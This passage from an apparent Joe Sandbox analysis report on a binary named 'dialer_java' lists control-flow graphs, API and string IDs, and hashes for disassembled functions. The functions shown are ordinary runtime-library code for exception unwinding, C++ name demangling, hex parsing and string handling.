                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fflush$Unwindabortgetenvmemcpy
                                      • String ID: CCG $CCG!$Personality continued unwind at the target frame!$Personality indicated exception handler in phase 2!$Personality installed context during phase 1!$RtlUnwindEx() failed$_GCC_specific_handler$libunwind: %s - %s$libunwind: _GCC_specific_handler(%#010lx(%lx), %p)$libunwind: _GCC_specific_handler() calling personality function %p(1, %d, %llx, %p, %p)$libunwind: _GCC_specific_handler() personality returned %d
                                      • API String ID: 4246679292-2140983942
                                      • Opcode ID: 399306ebe4ceb0f237bae98179e1acdd12333d68336ae5344bae23e9d3188841
                                      • Instruction ID: bc7863c0a9ca55d079812c8c020fa98fd0fe0c5237e64cc7a00b74deb47c2639
                                      • Opcode Fuzzy Hash: 399306ebe4ceb0f237bae98179e1acdd12333d68336ae5344bae23e9d3188841
                                      • Instruction Fuzzy Hash: 0AD15C22A18AC281E6359B1DE4063F97BA4FF94784F004139DE8DA37A1DF3EE1968745

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1494 7ff6e3a72bca-7ff6e3a72bdb 1495 7ff6e3a72fd1 1494->1495 1496 7ff6e3a72be1-7ff6e3a72bed isxdigit 1494->1496 1497 7ff6e3a72fd3-7ff6e3a72fe2 1495->1497 1496->1495 1498 7ff6e3a72bf3-7ff6e3a72bff isxdigit 1496->1498 1498->1495 1499 7ff6e3a72c05-7ff6e3a72c11 isxdigit 1498->1499 1499->1495 1500 7ff6e3a72c17-7ff6e3a72c23 isxdigit 1499->1500 1500->1495 1501 7ff6e3a72c29-7ff6e3a72c35 isxdigit 1500->1501 1501->1495 1502 7ff6e3a72c3b-7ff6e3a72c47 isxdigit 1501->1502 1502->1495 1503 7ff6e3a72c4d-7ff6e3a72c59 isxdigit 1502->1503 1503->1495 1504 7ff6e3a72c5f-7ff6e3a72c6b isxdigit 1503->1504 1504->1495 1505 7ff6e3a72c71-7ff6e3a72c7d isxdigit 1504->1505 1505->1495 1506 7ff6e3a72c83-7ff6e3a72c8f isxdigit 1505->1506 1506->1495 1507 7ff6e3a72c95-7ff6e3a72ca1 isxdigit 1506->1507 1507->1495 1508 7ff6e3a72ca7-7ff6e3a72cb3 isxdigit 1507->1508 1508->1495 1509 7ff6e3a72cb9-7ff6e3a72cc5 isxdigit 1508->1509 1509->1495 1510 7ff6e3a72ccb-7ff6e3a72cd7 isxdigit 1509->1510 1510->1495 1511 7ff6e3a72cdd-7ff6e3a72ce9 isxdigit 1510->1511 1511->1495 1512 7ff6e3a72cef-7ff6e3a72cfb isxdigit 1511->1512 1512->1495 1513 7ff6e3a72d01-7ff6e3a72d0d isxdigit 1512->1513 1513->1495 1514 7ff6e3a72d13-7ff6e3a72d1f isxdigit 1513->1514 1514->1495 1515 7ff6e3a72d25-7ff6e3a72d31 isxdigit 1514->1515 1515->1495 1516 7ff6e3a72d37-7ff6e3a72d43 isxdigit 1515->1516 1516->1495 1517 7ff6e3a72d49-7ff6e3a72d53 1516->1517 1517->1495 1518 7ff6e3a72d59-7ff6e3a72d5c 1517->1518 1518->1495 1519 7ff6e3a72d62-7ff6e3a72d81 1518->1519 1520 7ff6e3a72dad-7ff6e3a72dee 1519->1520 1521 7ff6e3a72d83-7ff6e3a72d90 malloc 1519->1521 1520->1495 1520->1497 1522 7ff6e3a72d96-7ff6e3a72daa 1521->1522 1523 7ff6e3a73080-7ff6e3a73085 call 7ff6e3a62d30 1521->1523 1522->1520
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: isxdigit$malloc
                                      • String ID:
                                      • API String ID: 1399014089-0
                                      • Opcode ID: 493b3504e96b5132e726ee44de8f28cecf9b5d1527bf54c4c4c996011feb9626
                                      • Instruction ID: dc9e5287f95094d1e8755021da0bf662a1f3816be4b6b370cf45547e255e8a5c
                                      • Opcode Fuzzy Hash: 493b3504e96b5132e726ee44de8f28cecf9b5d1527bf54c4c4c996011feb9626
                                      • Instruction Fuzzy Hash: 95515023708A8282E7544F38A8E573B2EA1AF44F81F080175CA6DE55D5DF6EE4F5D306

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1628 7ff6e3a77b80-7ff6e3a77ba4 1629 7ff6e3a77bad-7ff6e3a77bb6 1628->1629 1630 7ff6e3a77ba6-7ff6e3a77ba8 1628->1630 1632 7ff6e3a77bbc-7ff6e3a77bc5 1629->1632 1633 7ff6e3a77c77-7ff6e3a77ca3 call 7ff6e3a782a0 1629->1633 1631 7ff6e3a7808c-7ff6e3a780a2 1630->1631 1635 7ff6e3a77bcb-7ff6e3a77bd4 1632->1635 1636 7ff6e3a77d10-7ff6e3a77d32 call 7ff6e3a782a0 call 7ff6e3a6ba60 1632->1636 1642 7ff6e3a77ca5-7ff6e3a77cb2 malloc 1633->1642 1643 7ff6e3a77ccf-7ff6e3a77cfa 1633->1643 1638 7ff6e3a77bda-7ff6e3a77be3 1635->1638 1639 7ff6e3a77dc5-7ff6e3a77e48 call 7ff6e3a782a0 1635->1639 1636->1630 1662 7ff6e3a77d38-7ff6e3a77d53 1636->1662 1638->1630 1644 7ff6e3a77be5-7ff6e3a77bf7 call 7ff6e3a77b80 1638->1644 1652 7ff6e3a77e4a-7ff6e3a77e58 1639->1652 1653 7ff6e3a77eb7-7ff6e3a77ed5 1639->1653 1647 7ff6e3a77cb8-7ff6e3a77ccc 1642->1647 1648 7ff6e3a780a3 call 7ff6e3a62d30 1642->1648 1649 7ff6e3a77d01-7ff6e3a77d0b 1643->1649 1644->1630 1661 7ff6e3a77bf9-7ff6e3a77c14 1644->1661 1647->1643 1659 7ff6e3a780a8-7ff6e3a780e1 _assert call 7ff6e3a780f0 call 7ff6e3a63f50 1648->1659 1649->1631 1657 7ff6e3a77e5a-7ff6e3a77e6f realloc 1652->1657 1658 7ff6e3a77e76-7ff6e3a77e81 malloc 1652->1658 1660 7ff6e3a77f2a-7ff6e3a77f31 1653->1660 1665 7ff6e3a77ea4-7ff6e3a77eb0 1657->1665 1666 7ff6e3a77e71 1657->1666 1658->1648 1667 7ff6e3a77e87-7ff6e3a77e8d 1658->1667 1663 7ff6e3a77f38-7ff6e3a77f46 call 7ff6e3a77b80 1660->1663 1664 7ff6e3a77f33-7ff6e3a77f36 1660->1664 1669 7ff6e3a77c16-7ff6e3a77c23 malloc 1661->1669 1670 7ff6e3a77c40-7ff6e3a77c72 1661->1670 1671 7ff6e3a77d55-7ff6e3a77d62 malloc 1662->1671 1672 7ff6e3a77d7f-7ff6e3a77dc0 1662->1672 1684 7ff6e3a77f4c-7ff6e3a77f54 1663->1684 1685 7ff6e3a78049-7ff6e3a7806b 1663->1685 1664->1663 1676 7ff6e3a77f9d-7ff6e3a77fce call 7ff6e3a6d9a0 1664->1676 1665->1653 1666->1648 1678 7ff6e3a77e9d 1667->1678 1679 7ff6e3a77e8f-7ff6e3a77e98 memcpy 1667->1679 1669->1648 1673 7ff6e3a77c29-7ff6e3a77c3d 1669->1673 1670->1649 1671->1648 1674 7ff6e3a77d68-7ff6e3a77d7c 1671->1674 1672->1631 1673->1670 1674->1672 1691 7ff6e3a77ffa-7ff6e3a78043 1676->1691 1692 7ff6e3a77fd0-7ff6e3a77fdd malloc 1676->1692 1678->1665 1679->1678 1689 7ff6e3a77f56-7ff6e3a77f67 1684->1689 1690 7ff6e3a77f1e-7ff6e3a77f26 1684->1690 1685->1659 1687 7ff6e3a7806d-7ff6e3a78085 1685->1687 1687->1631 1694 7ff6e3a78087 free 1687->1694 1695 7ff6e3a77f6d-7ff6e3a77f78 malloc 1689->1695 1696 7ff6e3a77ee0-7ff6e3a77eef realloc 1689->1696 1690->1660 1691->1685 1692->1648 1693 7ff6e3a77fe3-7ff6e3a77ff7 1692->1693 1693->1691 1694->1631 1695->1648 1697 7ff6e3a77f7e-7ff6e3a77f84 1695->1697 1696->1648 1698 7ff6e3a77ef5-7ff6e3a77f1a 1696->1698 1699 7ff6e3a77f86-7ff6e3a77f8f memcpy 1697->1699 1700 7ff6e3a77f94-7ff6e3a77f98 1697->1700 1698->1690 1699->1700 1700->1698
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fflush$Unwind_assertabortmalloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
                                      • API String ID: 2460331008-2552725819
                                      • Opcode ID: 0c80bad6e972a27b6348764f3f0f3f2045ecc6d1aad5778c6820c893f99cd668
                                      • Instruction ID: 17e6341207715b3a8039c150026c19bb2a97ae1c28bdf7d3c4d0f0a134568745
                                      • Opcode Fuzzy Hash: 0c80bad6e972a27b6348764f3f0f3f2045ecc6d1aad5778c6820c893f99cd668
                                      • Instruction Fuzzy Hash: F3E1E333719B8185EA24CB19E48A3BA7BA8FB44B80F454135DA8D977D5DF3EE182C305

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1701 7ff6e3a72df3-7ff6e3a72e04 1702 7ff6e3a72e0a-7ff6e3a72e16 isxdigit 1701->1702 1703 7ff6e3a72fd1 1701->1703 1702->1703 1704 7ff6e3a72e1c-7ff6e3a72e28 isxdigit 1702->1704 1705 7ff6e3a72fd3-7ff6e3a72fe2 1703->1705 1704->1703 1706 7ff6e3a72e2e-7ff6e3a72e3a isxdigit 1704->1706 1706->1703 1707 7ff6e3a72e40-7ff6e3a72e4c isxdigit 1706->1707 1707->1703 1708 7ff6e3a72e52-7ff6e3a72e5e isxdigit 1707->1708 1708->1703 1709 7ff6e3a72e64-7ff6e3a72e70 isxdigit 1708->1709 1709->1703 1710 7ff6e3a72e76-7ff6e3a72e82 isxdigit 1709->1710 1710->1703 1711 7ff6e3a72e88-7ff6e3a72e94 isxdigit 1710->1711 1711->1703 1712 7ff6e3a72e9a-7ff6e3a72ea6 isxdigit 1711->1712 1712->1703 1713 7ff6e3a72eac-7ff6e3a72eb8 isxdigit 1712->1713 1713->1703 1714 7ff6e3a72ebe-7ff6e3a72eca isxdigit 1713->1714 1714->1703 1715 7ff6e3a72ed0-7ff6e3a72edc isxdigit 1714->1715 1715->1703 1716 7ff6e3a72ee2-7ff6e3a72eee isxdigit 1715->1716 1716->1703 1717 7ff6e3a72ef4-7ff6e3a72f00 isxdigit 1716->1717 1717->1703 1718 7ff6e3a72f06-7ff6e3a72f12 isxdigit 1717->1718 1718->1703 1719 7ff6e3a72f18-7ff6e3a72f24 isxdigit 1718->1719 1719->1703 1720 7ff6e3a72f2a-7ff6e3a72f34 1719->1720 1720->1703 1721 7ff6e3a72f3a-7ff6e3a72f3d 1720->1721 1721->1703 1722 7ff6e3a72f43-7ff6e3a72f62 1721->1722 1723 7ff6e3a72f64-7ff6e3a72f71 malloc 1722->1723 1724 7ff6e3a72f8e-7ff6e3a72fcf 1722->1724 1725 7ff6e3a72f77-7ff6e3a72f8b 1723->1725 1726 7ff6e3a73080-7ff6e3a73085 call 7ff6e3a62d30 1723->1726 1724->1703 1724->1705 1725->1724
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: isxdigit$malloc
                                      • String ID:
                                      • API String ID: 1399014089-0
                                      • Opcode ID: 7f82570470b9a3b9cecc052cb3018d2ab878e44e7211999c67834c7bc2493845
                                      • Instruction ID: 8dc01b65e07d99631029e2b749e94af8a5b29190dc24c0b5d368b26cde054ecf
                                      • Opcode Fuzzy Hash: 7f82570470b9a3b9cecc052cb3018d2ab878e44e7211999c67834c7bc2493845
                                      • Instruction Fuzzy Hash: D2516323708A8242E7544F38A8E533A6FA1AF44F81F080175CA6DA65D5DF6EE4F1D306

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1729 7ff6e3a782a0-7ff6e3a782e0 1730 7ff6e3a7830d-7ff6e3a78354 1729->1730 1731 7ff6e3a782e2-7ff6e3a782ef malloc 1729->1731 1734 7ff6e3a783fc-7ff6e3a78410 _assert 1730->1734 1735 7ff6e3a7835a-7ff6e3a78368 1730->1735 1732 7ff6e3a78416-7ff6e3a78433 call 7ff6e3a62d30 1731->1732 1733 7ff6e3a782f5-7ff6e3a7830a 1731->1733 1742 7ff6e3a78495-7ff6e3a784ab 1732->1742 1743 7ff6e3a78435-7ff6e3a78438 1732->1743 1733->1730 1734->1732 1737 7ff6e3a7836a-7ff6e3a78380 1735->1737 1738 7ff6e3a783d7-7ff6e3a783fb 1735->1738 1740 7ff6e3a78398-7ff6e3a783a3 malloc 1737->1740 1741 7ff6e3a78382-7ff6e3a78394 realloc 1737->1741 1740->1732 1746 7ff6e3a783a5-7ff6e3a783ab 1740->1746 1744 7ff6e3a78396 1741->1744 1745 7ff6e3a783bf-7ff6e3a783d2 1741->1745 1749 7ff6e3a784ad-7ff6e3a784d0 realloc 1742->1749 1750 7ff6e3a784d9-7ff6e3a784e9 1742->1750 1747 7ff6e3a784eb-7ff6e3a78501 1743->1747 1748 7ff6e3a7843e-7ff6e3a78440 1743->1748 1744->1732 1745->1738 1751 7ff6e3a783ad-7ff6e3a783b6 memcpy 1746->1751 1752 7ff6e3a783bb 1746->1752 1758 7ff6e3a78503-7ff6e3a78526 realloc 1747->1758 1759 7ff6e3a7852f 1747->1759 1753 7ff6e3a7853d-7ff6e3a78542 1748->1753 1754 7ff6e3a78446-7ff6e3a7845c 1748->1754 1755 7ff6e3a784d6 1749->1755 1756 7ff6e3a785f1-7ff6e3a785f6 call 7ff6e3a62d30 1749->1756 1757 7ff6e3a7853a 1750->1757 1751->1752 1752->1745 1761 7ff6e3a785e9-7ff6e3a785f0 1753->1761 1762 7ff6e3a78548-7ff6e3a78556 1753->1762 1763 7ff6e3a7848a-7ff6e3a78490 1754->1763 1764 7ff6e3a7845e-7ff6e3a78481 realloc 1754->1764 1755->1750 1757->1753 1758->1756 1766 7ff6e3a7852c 1758->1766 1760 7ff6e3a78535 1759->1760 1760->1757 1767 7ff6e3a78560-7ff6e3a78589 1762->1767 1763->1760 1764->1756 1768 7ff6e3a78487 1764->1768 1766->1759 1767->1767 1770 7ff6e3a7858b-7ff6e3a7858e 1767->1770 1768->1763 1770->1761 1771 7ff6e3a78590-7ff6e3a785a4 1770->1771 1772 7ff6e3a785a6-7ff6e3a785c9 realloc 1771->1772 1773 7ff6e3a785cf-7ff6e3a785e5 memcpy 1771->1773 1772->1756 1774 7ff6e3a785cb 1772->1774 1773->1761 1774->1773
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$mallocmemcpy$_assert
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Calling back() on empty vector!"$yptn
                                      • API String ID: 3355138791-4068048850
                                      • Opcode ID: 4d44fd90ec9d97f9a4df74b2dd578239c104db6aa568a6ee0de0dbe9cbb52ee8
                                      • Instruction ID: 30cf324053e77a2a0a705cf1cd444a37772aa29550a17be1cc784e93a3a5c885
                                      • Opcode Fuzzy Hash: 4d44fd90ec9d97f9a4df74b2dd578239c104db6aa568a6ee0de0dbe9cbb52ee8
                                      • Instruction Fuzzy Hash: BB91E1B3B05B8282EA25CB09E48A7796BA9EB547C4F448131CF4D97794EF3CE581C305

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1775 7ff6e3a7f790-7ff6e3a7f7a7 1776 7ff6e3a7f7a9-7ff6e3a7f7b1 1775->1776 1777 7ff6e3a7f7e2-7ff6e3a7f802 1775->1777 1776->1777 1778 7ff6e3a7f7b3-7ff6e3a7f7b8 1776->1778 1782 7ff6e3a7f81d-7ff6e3a7f82f 1777->1782 1783 7ff6e3a7f804-7ff6e3a7f807 1777->1783 1778->1777 1779 7ff6e3a7f7ba-7ff6e3a7f7dc 1778->1779 1779->1777 1781 7ff6e3a7f959-7ff6e3a7f96f 1779->1781 1786 7ff6e3a7f99d-7ff6e3a7f9b9 1781->1786 1787 7ff6e3a7f971-7ff6e3a7f994 realloc 1781->1787 1784 7ff6e3a7f831-7ff6e3a7f854 realloc 1782->1784 1785 7ff6e3a7f85e-7ff6e3a7f862 1782->1785 1788 7ff6e3a7f809-7ff6e3a7f81b 1783->1788 1789 7ff6e3a7f866-7ff6e3a7f875 1783->1789 1790 7ff6e3a7f85a 1784->1790 1791 7ff6e3a7fa4f-7ff6e3a7fa74 call 7ff6e3a62d30 1784->1791 1785->1789 1795 7ff6e3a7f9bb-7ff6e3a7f9cd 1786->1795 1796 7ff6e3a7fa0e-7ff6e3a7fa1c 1786->1796 1787->1791 1794 7ff6e3a7f99a 1787->1794 1788->1782 1788->1789 1792 7ff6e3a7f8bb-7ff6e3a7f8cd 1789->1792 1793 7ff6e3a7f877-7ff6e3a7f87a 1789->1793 1790->1785 1816 7ff6e3a7fa76-7ff6e3a7fa7e 1791->1816 1817 7ff6e3a7faaf-7ff6e3a7faba 1791->1817 1798 7ff6e3a7f8fc-7ff6e3a7f900 1792->1798 1799 7ff6e3a7f8cf-7ff6e3a7f8f2 realloc 1792->1799 1803 7ff6e3a7f87c-7ff6e3a7f88e 1793->1803 1804 7ff6e3a7f898-7ff6e3a7f89d 1793->1804 1794->1786 1805 7ff6e3a7f9f7-7ff6e3a7fa0b memcpy 1795->1805 1806 7ff6e3a7f9cf-7ff6e3a7f9f2 realloc 1795->1806 1800 7ff6e3a7fa46-7ff6e3a7fa4a 1796->1800 1801 7ff6e3a7fa1e-7ff6e3a7fa41 realloc 1796->1801 1809 7ff6e3a7f904-7ff6e3a7f91a 1798->1809 1799->1791 1807 7ff6e3a7f8f8 1799->1807 1810 7ff6e3a7f94c-7ff6e3a7f958 1800->1810 1801->1791 1808 7ff6e3a7fa43 1801->1808 1803->1792 1822 7ff6e3a7f890-7ff6e3a7f894 1803->1822 1804->1792 1812 7ff6e3a7f89f-7ff6e3a7f8a5 1804->1812 1805->1796 1806->1791 1813 7ff6e3a7f9f4 1806->1813 1807->1798 1808->1800 1814 7ff6e3a7f91c-7ff6e3a7f93f realloc 1809->1814 1815 7ff6e3a7f948 1809->1815 1812->1809 1819 7ff6e3a7f8a7-7ff6e3a7f8b9 1812->1819 1813->1805 1814->1791 1820 7ff6e3a7f945 1814->1820 1815->1810 1816->1817 1821 7ff6e3a7fa80-7ff6e3a7fa85 1816->1821 1823 7ff6e3a7fabc-7ff6e3a7fabf 1817->1823 1824 7ff6e3a7fb00-7ff6e3a7fb12 1817->1824 1819->1792 1819->1809 1820->1815 1821->1817 1827 7ff6e3a7fa87-7ff6e3a7faa9 1821->1827 1822->1804 1828 7ff6e3a7fadd-7ff6e3a7fae2 1823->1828 1829 7ff6e3a7fac1-7ff6e3a7fad3 1823->1829 1825 7ff6e3a7fb3d-7ff6e3a7fb41 1824->1825 1826 7ff6e3a7fb14-7ff6e3a7fb37 realloc 1824->1826 1834 7ff6e3a7fb45-7ff6e3a7fb5f 1825->1834 1832 7ff6e3a7fb6b-7ff6e3a7fb70 call 7ff6e3a62d30 1826->1832 1833 7ff6e3a7fb39 1826->1833 1827->1817 1835 7ff6e3a7fb63-7ff6e3a7fb6a 1827->1835 1828->1824 1831 7ff6e3a7fae4-7ff6e3a7faea 1828->1831 1829->1824 1839 7ff6e3a7fad5-7ff6e3a7fad9 1829->1839 1831->1834 1836 7ff6e3a7faec-7ff6e3a7fafe 1831->1836 1833->1825 1834->1835 1836->1824 1836->1834 1839->1828
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID: c_object$c_object$objc_obj$objc_obj
                                      • API String ID: 1833655766-1179801904
                                      • Opcode ID: 68cd87f9df8f5cfa69a5d2627882f52522deb85eface613025237f93cf7fe6bf
                                      • Instruction ID: 337addcbc56010228b2d8a4503044c324e7b98873a31695eccfb9e449d0bcd78
                                      • Opcode Fuzzy Hash: 68cd87f9df8f5cfa69a5d2627882f52522deb85eface613025237f93cf7fe6bf
                                      • Instruction Fuzzy Hash: EEC15EB7B05B8682EE248F1AE4953796BA1EB55FC0F148432CB8D97394DF2DD581C305

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1842 7ff6e3a87f20-7ff6e3a87f8d memset 1843 7ff6e3a88191-7ff6e3a881b0 memset 1842->1843 1844 7ff6e3a87f93-7ff6e3a87fd1 1842->1844 1845 7ff6e3a88362-7ff6e3a8839d call 7ff6e3a61370 1843->1845 1846 7ff6e3a881b6-7ff6e3a881bd 1843->1846 1847 7ff6e3a87ff3-7ff6e3a88000 1844->1847 1850 7ff6e3a881bf-7ff6e3a881f2 1845->1850 1862 7ff6e3a883a3 1845->1862 1846->1850 1851 7ff6e3a881f9-7ff6e3a882f8 wcscpy wcscat wcslen call 7ff6e3a61422 1846->1851 1848 7ff6e3a8800a-7ff6e3a88021 memset 1847->1848 1849 7ff6e3a88002-7ff6e3a88008 1847->1849 1854 7ff6e3a88027-7ff6e3a8802e 1848->1854 1855 7ff6e3a8814b-7ff6e3a88186 call 7ff6e3a61370 1848->1855 1849->1848 1853 7ff6e3a87fe0 1849->1853 1850->1851 1865 7ff6e3a88335-7ff6e3a88361 1851->1865 1866 7ff6e3a882fa-7ff6e3a88330 call 7ff6e3a61431 call 7ff6e3a6145e 1851->1866 1863 7ff6e3a87fe6-7ff6e3a87fed 1853->1863 1858 7ff6e3a88063-7ff6e3a8812e wcscpy wcscat wcslen call 7ff6e3a61422 1854->1858 1859 7ff6e3a88030-7ff6e3a8805c 1854->1859 1855->1859 1870 7ff6e3a8818c 1855->1870 1871 7ff6e3a8813a-7ff6e3a88143 1858->1871 1872 7ff6e3a88130-7ff6e3a88135 call 7ff6e3a6145e 1858->1872 1859->1858 1862->1851 1863->1843 1863->1847 1866->1865 1870->1858 1871->1863 1876 7ff6e3a88149 1871->1876 1872->1871 1876->1843
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: memset$wcscatwcscpywcslen
                                      • String ID: $0$0$@$@
                                      • API String ID: 4263182637-1413854666
                                      • Opcode ID: cdbdf97fc269be1a0d164d62ed342f19875fa9a7fd4d8a48898fd4e855d17c00
                                      • Instruction ID: a15ec1ce10d61be537783860eacb7ce58bd3e260eef3110cd27650aff47bac04
                                      • Opcode Fuzzy Hash: cdbdf97fc269be1a0d164d62ed342f19875fa9a7fd4d8a48898fd4e855d17c00
                                      • Instruction Fuzzy Hash: E7B1A562A1C7C285F3218B19E80A3BA7BA0FF95344F401135EACDA2655DF7ED186C709

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
